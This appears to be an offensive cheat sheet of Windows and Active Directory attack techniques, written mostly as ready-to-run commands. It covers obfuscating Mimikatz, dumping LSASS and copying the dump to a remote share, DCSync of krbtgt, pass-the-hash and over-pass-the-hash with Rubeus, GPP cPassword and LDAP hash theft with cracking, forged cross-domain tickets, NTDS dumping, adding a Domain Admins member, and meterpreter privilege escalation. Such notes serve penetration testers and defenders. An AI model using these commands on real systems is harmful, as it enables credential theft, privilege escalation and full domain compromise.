Exploitation Tricks

Obfuscation

# There are many ways you can use to obfuscate conten
# PyFuscation (https://github.com/CBHue/PyFuscation) bring small usefull features
$ python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1 


“Double Hop” - What is it and how to solve ?

# Great resource (french)
http://inf0sec.fr/article-16.php

# TL;DR
# 2 authentications types
# Network Logon --> Ex : WinRM through PtH (Windows won't store credentials)
# Non-Network Logon --> Ex : RDP, entering directly password and Windows storing it

# In order to access privileged commands (typical, psexec on a DC)
# Windows needs to have credentials in the Logon Session
# If the authentication is "Network Logon", you have no creds in session and can't exec

# Solution : local pass the hash (or runas)
# Mimikatz


Using Powershell AD Module without RSAT

# The secret to being able to run AD enumeration commands from the AD Powershell
# is the DLL located in C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management

# You can just grab it on a system with RSAT and drop it on the target
Import-Module .\Microsoft.ActiveDirectory.Management.dll

# Then you can use the module...
Get-Command get-adcom*

# Don't need admin rights !


Dumping LSASS

# If you are SYSTEM and need creds, you can dump lsass.exe and then use Mimikatz in local
procdump.exe -ma lsass.exe lsadump.dmp
copy lsadump.dmp \\IP\yourshare\lsadump.dmp

# Then mimikatz...
privilege::debug
sekurlsa::minidump lsadump.dmp
sekurlsa:logonPasswords /full
# You can also remotely dump lsass and then process it locally

# Method 1
# Open a SMB Server, drop mimikatz or procdump and get your output back to your SMB Server

# Method 2
# https://github.com/aas-n/spraykatz
# It will mass dump LSASS and process them locally to get outputs
./spraykatz.py -d company.local -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24


DCSync using misconfigured AD

# These permissions can be abused to sync passwords
# DS-Replication-Get-Changes
# DS-Replication-Get-Changes-All
# DS-Replication-Get-Changes-In-Filtered-Set
http://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/

# Inspecting privileges
# Using PowerView
Get-ObjectAcl -Identity "dc=offense,dc=local" -ResolveGUIDs | ? {$_.SecurityIdentifier -match "S-1-5-21-2552734371-813931464-1050690807-1106"}

# Using the AD Module
Import-Module ActiveDirectory
(Get-Acl "ad:\dc=offense,dc=local").Access | ? {$_.IdentityReference -match 'spotless' -and ($_.ObjectType -eq "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" -or $_.ObjectType -eq "89e95b76-444d-4c62-991a-0facbeda640c" ) }

# You can just use mimikatz to dump if you have these rights
mimikatz> lsadump::dcsync /user:krbtgt


Over-Pass-The-Hash

http://inf0sec.fr/article-17.php

# OPtH is not using LSASS but asking a TGT to the DC using the NT hash

# First ask a TGT for your user
Rubeus.exe asktgt /user:<redacted> /rc4:<redacted>

# Only one TGT can be loaded in an existing Logon Session
# To avoid any trouble, you can create a new hidden process (it generates a type 1 event-ID)
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe"

# Then pass the ticket to the new session
Rubeus.exe ptt /ticket:<ticket en base64> /luid:0x4a0717f


Extracting NTLM hashes from SAM database

# samdump2 allows you to extract NTLM hashes from the SAM database
# You need to have SAM and SYSTEM files locally
samdump2 SYSTEM SAM > hashes.txt


From non-auth user to local admin in 3 steps

# Nullsession
net use \\dc\ipc$ "" /u:""

# Search for cpasswords in gpo's:
dir \\dc\sysvol\contoso.corp\Policies -r -I *.xml | Select-String cPassword >> dump.txt

# Decrypt the cPassword
gpp-decrypt <string>


Getting and cracking LDPA user hash

# STEP 1: Dump target user hash:
ldapsearch –x –h <LDAP_IPAddr> -D "cn=Directory Manager" -w <password> -b 'uid=<target_username>,cn=users,cn=accounts,dc=<DOMAIN>,dc=COM' uid userpassword krbprincipalkey sambalmpassword sambantpassword

# STEP 2: The ‘userpassword::’ and ‘krbprincipalkey::’ hash is base64 encoded and now you need to decode it:
echo 'e1NTSEF9dHZEaUZ4ejJTUkRBLzh1NUZSSGVIT2N4WkZMci9OYktQNHNLNWc9PQ==' | base64 --decode
{SSHA}tvDiFxz2SRDA/8u5FRHeHOcxZFLr/NbKP4sK5g==

# STEP 3: Place your decoded hash into hash.txt file and fire up Hashcat mode ‘111’ and attempt to crack the password hash:
hashcat –a 0 –m 111 hash.txt dict.txt


From one domain to another

# Hash/password replay to find one user on the second domain
$ crackmapexec smb <ip> -u user -p -H hash --shares
$ impacket/examples/smbclient DOMAIN/USER@IP -hashes <hash>

# Look for things like automated tasks ran by admins
# Write access
# net user foo fooPassword /add /y
# net group "Domain Admins" foo /add

$ psexec.py domain/user@ip

# Test trust relationship
$ nltest /trusted_domain
$ nltest /dclist:<domain>

# Create a new ticket for the second domain with the extra-sid
# nthash → krbtgt compromised hash
# domain-sid → compromised domain SID
# domain → Already compromissed domain
# extra-sid → Target domain (+519 = enterprise admin)
$ ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519

# Exec and use the ticket
$ /impacket/examples/psexec.py -k -n -debug DOMAIN/user@host_DC

# Dump NTDS
$ proxychains secretsdump.py -k -no-pass qsec@DCFIL.PRAMAFIL.CORP -use-vss

# look for the admin workstation

# go RDP (or psexec also)
$ crackmapexec smb <ip> -u user -H hash -M rdp -o ACTION=enable


Powershell through Metasploit

# You can load powershell and get a Powershell like shell
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > cd "C:\Users\kostas\Desktop"
PS > ls

# Then you can run Powershell scripts
PS > ./MS16-032.ps1
PS > Import-Module ./MS16-032.ps1
PS > Invoke-MS16-032